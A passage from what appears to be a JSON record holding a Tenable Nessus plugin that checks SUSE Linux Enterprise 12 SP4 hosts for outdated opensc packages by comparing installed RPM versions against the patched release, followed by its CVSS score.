patch\nSUSE-SLE-DESKTOP-12-SP4-2018-2582=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:opensc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:opensc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:opensc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! ereg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"opensc-0.13.0-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"opensc-debuginfo-0.13.0-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"opensc-debugsource-0.13.0-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"opensc-0.13.0-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"opensc-debuginfo-0.13.0-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"opensc-debugsource-0.13.0-3.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opensc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
